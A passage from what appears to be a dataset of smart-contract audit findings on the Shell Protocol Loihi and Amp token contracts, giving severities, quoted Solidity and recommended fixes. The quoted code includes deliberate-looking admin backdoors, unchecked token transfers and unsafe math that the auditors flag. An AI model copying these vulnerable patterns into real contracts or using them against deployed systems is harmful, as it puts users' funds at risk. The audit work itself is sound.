msg.sender);\\n\\n}\\n```\\n\\nIt calls `transferByOrigin` and we simplify this example and consider we have `_o.ix == _t.ix`\\n```\\nfunction transferByOrigin (address \\_origin, address \\_target, uint256 \\_dline, uint256 \\_mTAmt, uint256 \\_oAmt, address \\_rcpnt) public notFrozen nonReentrant returns (uint256 tAmt\\_) {\\n\\n Assimilators.Assimilator memory \\_o = shell.assimilators[\\_origin];\\n Assimilators.Assimilator memory \\_t = shell.assimilators[\\_target];\\n\\n // TODO: how to include min target amount\\n if (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn which case it can call 2 functions on an assimilatior such as `MainnetDaiToDaiAssimilator`.\\nThe first called function is `intakeRaw`.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nAnd its result is used in `outputNumeraire` that again does not have any checks.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\nчResolution\\nComment from the development team:\\nNow all functions in the Orchestrator revert on incorrect arguments.\\nAll functions in Loihi in general revert on incorrect arguments.\\nImplement the `checks-effects-interactions` as a pattern to write code. Add tests that check if all of the arguments have been validated.\\nConsider checking arguments as an important part of writing code and developing the system.чч```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n -Remove Loihi methods that can be used as backdoors by the administratorчhighчThere are several functions in `Loihi` that give extreme powers to the shell administrator. The most dangerous set of those is the ones granting the capability to add assimilators.\\nSince assimilators are essentially a proxy architecture to delegate code to several different implementations of the same interface, the administrator could, intentionally or unintentionally, deploy malicious or faulty code in the implementation of an assimilator. This means that the administrator is essentially totally trusted to not run code that, for example, drains the whole pool or locks up the users' and LPs' tokens.\\nIn addition to these, the function `safeApprove` allows the administrator to move any of the tokens the contract holds to any address regardless of the balances any of the users have.\\nThis can also be used by the owner as a backdoor to completely drain the contract.\\n```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(\"approve(address,uint256)\", \\_spender, \\_value));\\n\\n require(success, \"SafeERC20: low-level call failed\");\\n\\n}\\n```\\nчRemove the `safeApprove` function and, instead, use a trustless escape-hatch mechanism like the one suggested in issue 6.1.\\nFor the assimilator addition functions, our recommendation is that they are made completely internal, only callable in the constructor, at deploy time.\\nEven though this is not a big structural change (in fact, it reduces the attack surface), it is, indeed, a feature loss. However, this is the only way to make each shell a time-invariant system.\\nThis would not only increase Shell's security but also would greatly improve the trust the users have in the protocol since, after deployment, the code is now static and auditable.чч```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(\"approve(address,uint256)\", \\_spender, \\_value));\\n\\n require(success, \"SafeERC20: low-level call failed\");\\n\\n}\\n```\\n -Assimilators should implement an interfaceчhighчThe Assimilators are one of the core components within the application. They are used to move the tokens and can be thought of as a “middleware” between the Shell Protocol application and any other supported tokens.\\nThe methods attached to the assimilators are called throughout the application and they are a critical component of the whole system. Because of this fact, it is extremely important that they behave correctly.\\nA suggestion to restrict the possibility of errors when implementing them and when using them is to make all of the assimilators implement a unique specific interface. This way, any deviation would be immediately observed, right when the compilation happens.\\nConsider this example. The user calls `swapByOrigin`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nWhich calls `transferByOrigin`. In `transferByOrigin`, if the origin index matches the target index, a different execution branch is activated.\\n```\\nif (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn this case we need the output of `_o.addr.intakeRaw(_oAmt)`.\\nIf we pick a random assimilator and check the implementation, we see the function `intakeRaw` needs to return the transferred amount.\\n```\\n// takes raw cdai amount, transfers it in, calculates corresponding numeraire amount and returns it\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_) {\\n\\n bool success = cdai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n if (!success) revert(\"CDai/transferFrom-failed\");\\n\\n uint256 \\_rate = cdai.exchangeRateStored();\\n\\n \\_amount = ( \\_amount \\* \\_rate ) / 1e18;\\n\\n cdai.redeemUnderlying(\\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nHowever, with other implementations, the returns do not match. In the case of `MainnetDaiToDaiAssimilator`, it returns 2 values, which will make the `Loihi` contract work in this case but can misbehave in other cases, or even fail.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nMaking all the assimilators implement one unique interface will enforce the functions to look the same from the outside.чCreate a unique interface for the assimilators and make all the contracts implement that interface.чч```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n -Assimilators do not conform to the ERC20 specificationчmediumчThe assimilators in the codebase make heavy usage of both the `transfer` and `transferFrom` methods in the ERC20 standard.\\nQuoting the relevant parts of the specification of the standard:\\nTransfers _value amount of tokens to address _to, and MUST fire the Transfer event. The function SHOULD throw if the message caller's account balance does not have enough tokens to spend.\\nThe transferFrom method is used for a withdraw workflow, allowing contracts to transfer tokens on your behalf. This can be used for example to allow a contract to transfer tokens on your behalf and/or to charge fees in sub-currencies. The function SHOULD throw unless the _from account has deliberately authorized the sender of the message via some mechanism.\\nWe can see that, even though it is suggested that ERC20-compliant tokens do `throw` on the lack of authorization from the sender or lack of funds to complete the transfer, the standard does not enforce it.\\nThis means that, in order to make the system both more resilient and future-proof, code in each implementation of current and future assimilators should check for the return value of both `transfer` and `transferFrom` call instead of just relying on the external contract to revert execution.\\nThe extent of this issue is only mitigated by the fact that new assets are only added by the shell administrator and could, therefore, be audited prior to their addition.\\nNon-exhaustive Examples\\n```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n\\n```\\ndai.transfer(\\_dst, \\_amount);\\n```\\nчAdd a check for the return boolean of the function.\\nExample:\\n`require(dai.transferFrom(msg.sender, address(this), _amount) == true);`чч```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n -Access to assimilators does not check for existence and allows delegation to the zeroth addressчmediumчFor every method that allows to selectively withdraw, deposit, or swap tokens in `Loihi`, the user is allowed to specify addresses for the assimilators of said tokens (by inputting the addresses of the tokens themselves).\\nThe shell then performs a lookup on a mapping called `assimilators` inside its main structure and uses the result of that lookup to delegate call the assimilator deployed by the shell administrator.\\nHowever, there are no checks for prior instantiation of a specific, supported token, effectively meaning that we can do a lookup on an all-zeroed-out member of that mapping and delegate call execution to the zeroth address.\\nFor example, the 32 bytes expected as a result of this call:\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\nThis is definitely an insufficient check since the interface for the assimilators might change in the future to include functions that have no return values.чCheck for the prior instantiation of assimilators by including the following requirement:\\n`require(shell.assimilators[].ix != 0);`\\nIn all the functions that access the `assimilators` mapping and change the indexes to be 1-based instead pf 0-based.чч```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n -Math library's fork has problematic changesчmediumчThe math library ABDK Libraries for Solidity was forked and modified to add a few `unsafe_*` functions.\\n`unsafe_add`\\n`unsafe_sub`\\n`unsafe_mul`\\n`unsafe_div`\\n`unsafe_abs`\\nThe problem which was introduced is that `unsafe_add` ironically is not really unsafe, it is as safe as the original `add` function. It is, in fact, identical to the safe `add` function.\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\nFortunately, `unsafe_add` is not used anywhere in the code.\\nHowever, `unsafe_abs` was changed from this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction abs (int128 x) internal pure returns (int128) {\\n require (x != MIN\\_64x64);\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nTo this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_abs (int128 x) internal pure returns (int128) {\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nThe check that was removed, is actually an important check:\\n```\\nrequire (x != MIN\\_64x64);\\n```\\n\\n```\\nint128 private constant MIN\\_64x64 = -0x80000000000000000000000000000000;\\n```\\n\\nThe problem is that for an `int128` variable that is equal to `-0x80000000000000000000000000000000`, there is no absolute value within the constraints of `int128`.\\nStarting from int128 `n` = `-0x80000000000000000000000000000000`, the absolute value should be int128 `abs_n` = -n, however `abs_n` is equal to the initial value of `n`. The final value of `abs_n` is still `-0x80000000000000000000000000000000`. It's still not a positive or zero value. The operation `0 - n` wraps back to the same initial value.чRemove unused `unsafe_*` functions and try to find other ways of doing unsafe math (if it is fundamentally important) without changing existing, trusted, already audited code.чч```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n -Use one file for each contract or libraryчmediumчThe repository contains a lot of contracts and libraries that are added in the same file as another contract or library.\\nOrganizing the code in this manner makes it hard to navigate, develop and audit. It is a best practice to have each contract or library in its own file. The file also needs to bear the name of the hosted contract or library.\\n```\\nlibrary SafeERC20Arithmetic {\\n```\\n\\n```\\nlibrary Shells {\\n```\\n\\n```\\ncontract ERC20Approve {\\n function approve (address spender, uint256 amount) public returns (bool);\\n}\\n```\\n\\n```\\ncontract Loihi is LoihiRoot {\\n```\\n\\n```\\nlibrary Delegate {\\n```\\n\\n```\\nlibrary Assimilators {\\n```\\nчSplit up contracts and libraries in single files.чч```\\nlibrary SafeERC20Arithmetic {\\n```\\n -Remove debugging code from the repositoryчmediumчThroughout the repository, there is source code from the development stage that was used for debugging the functionality and was not removed.\\nThis should not be present in the source code and even if they are used while functionality is developed, they should be removed after the functionality was implemented.\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int128);\\nevent log\\_int(bytes32, int);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_addr(bytes32, address);\\n```\\n\\n```\\nevent log(bytes32);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log\\_int(bytes32, int);\\nevent log\\_ints(bytes32, int128[]);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_uints(bytes32, uint[]);\\nevent log\\_addrs(bytes32, address[]);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\n```\\n\\n```\\nshell.testHalts = true;\\n```\\n\\n```\\nfunction setTestHalts (bool \\_testOrNotToTest) public {\\n\\n shell.testHalts = \\_testOrNotToTest;\\n\\n}\\n```\\n\\n```\\nbool testHalts;\\n```\\nчRemove the debug functionality at the end of the development cycle of each functionality.чч```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n -Remove commented out code from the repositoryчmediumчHaving commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThere is no code that is important enough to be left commented out in a repository. Git branching should take care of having different code versions or diffs should show what was before.\\nIf there is commented out code, this also has to be maintained; it will be out of date if other parts of the system are changed, and the tests will not pick that up.\\nThe main problem is that commented code adds confusion with no real benefit. Code should be code, and comments should be comments.\\nCommented out code should be removed or dealt with in a separate branch that is later included in the master branch.\\n```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\n```\\nfunction transfer (address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transfer(\\_recipient, \\_amount);\\n}\\n\\nfunction transferFrom (address \\_sender, address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transferFrom(\\_sender, \\_recipient, \\_amount);\\n}\\n\\nfunction approve (address \\_spender, uint256 \\_amount) public nonReentrant returns (bool success\\_) {\\n // return shell.approve(\\_spender, \\_amount);\\n}\\n\\nfunction increaseAllowance(address \\_spender, uint256 \\_addedValue) public returns (bool success\\_) {\\n // return shell.increaseAllowance(\\_spender, \\_addedValue);\\n}\\n\\nfunction decreaseAllowance(address \\_spender, uint256 \\_subtractedValue) public returns (bool success\\_) {\\n // return shell.decreaseAllowance(\\_spender, \\_subtractedValue);\\n}\\n\\nfunction balanceOf (address \\_account) public view returns (uint256) {\\n // return shell.balances[\\_account];\\n}\\n```\\n\\n```\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_NO\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n```\\n\\n```\\n// function noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public returns (uint256 shellsMinted\\_) {\\n\\n// uint256 startingShells = l.proportionalDeposit(300e18);\\n\\n// uint256 gas = gasleft();\\n\\n// shellsMinted\\_ = l.depositHack(\\n// address(dai), 10e18,\\n// address(usdc), 10e6,\\n// address(usdt), 10e6,\\n// address(susd), 2.5e18\\n// );\\n\\n// emit log\\_uint(\"gas for deposit\", gas - gasleft());\\n\\n\\n// }\\n```\\nчRemove all the commented out code or transform it into comments.чч```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n -Should check if the asset already exists when adding a new assetчmediumчThe public function `includeAsset`\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nCalls the internal `includeAsset` implementation\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n```\\n\\nBut there is no check to see if the asset already exists in the list. Because the check was not done, `shell.numeraires` can contain multiple identical instances.\\n```\\nshell.numeraires.push(\\_numeraireAssimilator);\\n```\\nчCheck if the `_numeraire` already exists before invoking `includeAsset`.чч```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n -Check return values for both internal and external callsчlowчThere are some cases where functions which return values are called throughout the source code but the return values are not processed, nor checked.\\nThe returns should in principle be handled and checked for validity to provide more robustness to the code.\\nThe function `intakeNumeraire` receives a number of tokens and returns how many tokens were transferred to the contract.\\n```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n\\nSimilarly, the function `outputNumeraire` receives a destination address and an amount of token for withdrawal and returns a number of transferred tokens to the specified address.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n\\nHowever, the results are not handled in the main contract.\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\n```\\n\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_oBals[i].mul(\\_multiplier));\\n```\\n\\n```\\nshell.reserves[i].addr.outputNumeraire(msg.sender, \\_oBals[i].mul(\\_multiplier));\\n```\\n\\nA sanity check can be done to make sure that more than 0 tokens were transferred to the contract.\\n```\\nunit intakeAmount = shell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\nrequire(intakeAmount > 0, \"Must intake a positive number of tokens\");\\n```\\nчHandle all return values everywhere returns exist and add checks to make sure an expected value was returned.\\nIf the return values are never used, consider not returning them at all.чч```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n -Interfaces do not need to be implemented for the compiler to access their selectors.чlowч```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n\\nThis pattern is unneeded since you can reference selectors by using the imported interface directly without any implementation. It hinders both gas costs and readability of the code.ч```\\nbytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n```\\n\\nuse the expression:\\n`IAssimilator.viewRawAmount.selector`чч```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n -Use consistent interfaces for functions in the same groupчlowчThis library has 2 functions.\\n`add` which receives 2 arguments, `x` and `y`.\\n```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, \"add-overflow\");\\n}\\n```\\n\\n`sub` which receives 3 arguments `x`, `y` and `_errorMessage`.\\n```\\nfunction sub(uint x, uint y, string memory \\_errorMessage) internal pure returns (uint z) {\\n require((z = x - y) <= x, \\_errorMessage);\\n}\\n```\\n\\nIn order to reduce the cognitive load on the auditors and developers alike, somehow-related functions should have coherent logic and interfaces. Both of the functions either need to have 2 arguments, with an implied error message passed to `require`, or both functions need to have 3 arguments, with an error message that can be specified.чUpdate the functions to be coherent with other related functions.чч```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, \"add-overflow\");\\n}\\n```\\n -Consider emitting an event when changing the frozen state of the contractчlowчThe function `freeze` allows the owner to `freeze` and unfreeze the contract.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n\\nThe common pattern when doing actions important for the outside of the blockchain is to emit an event when the action is successful.\\nIt's probably a good idea to emit an event stating the contract was frozen or unfrozen.чCreate an event that displays the current state of the contract.\\n```\\nevent Frozen(bool frozen);\\n```\\n\\nAnd emit the event when `frozen` is called.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n emit Frozen(\\_freeze);\\n}\\n```\\nчч```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n -Function supportsInterface can be restricted to pureчlowчThe function `supportsInterface` returns a `bool` stating that the contract supports one of the defined interfaces.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n\\nThe function does not access or change the state of the contract, this is why it can be restricted to `pure`.чRestrict the function definition to `pure`.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public pure returns (bool) {\\n```\\nчч```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n -Use more consistent function naming (includeAssimilator / excludeAdapter)чlowчThe function `includeAssimilator` adds a new assimilator to the list\\n```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n\\nThe function `excludeAdapter` removes the specified assimilator from the list\\n```\\ndelete shell.assimilators[\\_assimilator];\\n```\\nчConsider renaming the function `excludeAdapter` to `removeAssimilator` and moving the logic of adding and removing in the same source file.чч```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n -Eliminate assembly code by using ABI decodeчhighчThere are several locations where assembly code is used to access and decode byte arrays (including uses inside loops). Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code.\\n```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nassembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\nчAs discussed in the mid-audit meeting, it is a good solution to use ABI decode since all uses of assembly simply access 32-byte chunks of data from user input. This should eliminate all assembly code and make the code significantly more clean. In addition, it might allow for more compact encoding in some cases (for instance, by eliminating or reducing the size of the flags).\\nThis suggestion can be also applied to Merkle Root verifications/calculation code, which can reduce the for loops and complexity of these functions.чч```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n -Ignored return value for transferFrom callчhighчWhen burning swap tokens the return value of the `transferFrom` call is ignored. Depending on the token's implementation this could allow an attacker to mint an arbitrary amount of Amp tokens.\\nNote that the severity of this issue could have been Critical if Flexa token was any arbitrarily tokens. We quickly verified that Flexa token implementation would revert if the amount exceeds the allowance, however it might not be the case for other token implementations.\\n```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\nчThe code should be changed like this:\\n```\\nrequire(swapToken.transferFrom(_from, swapTokenGraveyard, amount));\\n```\\nчч```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n -Potentially insufficient validation for operator transfersчmediumчFor operator transfers, the current validation does not require the sender to be an operator (as long as the transferred value does not exceed the allowance):\\n```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n\\nIt is unclear if this is the intention `or` whether the logical `or` should be a logical `and`.чResolution\\nremoving `operatorTransferByPartition` and simplifying the interfaces to only `tranferByPartition`\\nThis removes the existing tranferByPartition, converting operatorTransferByPartition to it. The reason for this is to make the client interface simpler, where there is one method to transfer by partition, and that method can be called by either a sender wanting to transfer from their own address, or an operator wanting to transfer from a different token holder address. We found that it was redundant to have multiple methods, and the client convenience wasn't worth the confusion.\\nConfirm that the code matches the intention. If so, consider documenting the behavior (for instance, by changing the name of function `operatorTransferByPartition`.чч```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n -Potentially missing nonce check AcknowledgedчmediumчWhen executing withdrawals in the collateral manager the per-address withdrawal nonce is simply updated without checking that the new nonce is one greater than the previous one (see Examples). It seems like without such a check it might be easy to make mistakes and causing issues with ordering of withdrawals.\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = maxWithdrawalRootNonce;\\n```\\n\\n```\\nmaxWithdrawalRootNonce = \\_nonce;\\n```\\nчConsider adding more validation and sanity checks for nonces on per-address withdrawals.чч```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n -Unbounded loop when validating Merkle proofsчmediumчIt seems like the loop for validating Merkle proofs is unbounded. If possible it would be good to have an upper bound to prevent DoS-like attacks. It seems like the depth of the tree, and thus, 